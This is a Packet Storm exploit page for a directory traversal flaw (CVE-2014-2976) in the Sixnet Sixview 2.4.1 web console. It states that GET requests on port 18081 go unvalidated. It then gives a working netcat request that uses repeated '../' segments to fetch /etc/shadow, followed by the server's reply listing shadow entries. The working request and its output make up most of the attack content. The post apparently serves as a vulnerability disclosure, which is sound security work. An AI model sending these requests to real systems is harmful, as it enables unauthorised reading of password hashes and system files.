what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Sixnet Sixview 2.4.1 Directory Traversal

Sixnet Sixview 2.4.1 Directory Traversal
Posted Apr 22, 2014
Authored by daniel svartman

Sixnet Sixview version 2.4.1 suffers from a directory traversal vulnerability.

tags | exploit, file inclusion
advisories | CVE-2014-2976
SHA-256 | 01cf2e952cb6e8a5f8d20f94845a9ada5d87bd828721483c34d78503bee0fea2

Sixnet Sixview 2.4.1 Directory Traversal

Change Mirror Download
#Exploit Title: Sixnet sixview web console directory traversal
#Date: 2014-04-21
#Exploit Author: daniel svartman
#Vendor Homepage: www.sixnet.com
#Software Link: Not available, hardware piece - appliance
#Version: 2.4.1
#Tested on: Sixnet Sixview web console (Linux based appliance)
#CVE : 2014-2976


PoV, Sixnet sixview web console handle requests through HTTP on port 18081.
These requests can be received either through GET or POST requests.
I discovered that GET requests are not validated at the server side,
allowing an attacker to request arbitrary files from the supporting OS.

Below is an example of the affected URL and the received answer using
netcat:


ncat <HOSTNAME> 18081
GET /../../../../../../../../../../etc/shadow HTTP/1.1


HTTP/1.1 200 OK
Connection: Keep-Alive
Content-Type: text/html
Keep-Alive: timeout=15, max=50
Date: <SNIP>
Last-Modified: <SNIP>
Content-Length: 1025

root:<REMOVED>:15655:0:99999:7:::
bin:*:15513:0:99999:7:::
daemon:*:15513:0:99999:7:::
adm:*:15513:0:99999:7:::
lp:*:15513:0:99999:7:::
sync:*:15513:0:99999:7:::
shutdown:*:15513:0:99999:7:::
halt:*:15513:0:99999:7:::
mail:*:15513:0:99999:7:::
uucp:*:15513:0:99999:7:::
<SNIP>

Login or Register to add favorites

File Archive:

December 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    2 Files
  • 2
    Dec 2nd
    12 Files
  • 3
    Dec 3rd
    0 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    14 Files
  • 6
    Dec 6th
    18 Files
  • 7
    Dec 7th
    11 Files
  • 8
    Dec 8th
    45 Files
  • 9
    Dec 9th
    9 Files
  • 10
    Dec 10th
    6 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close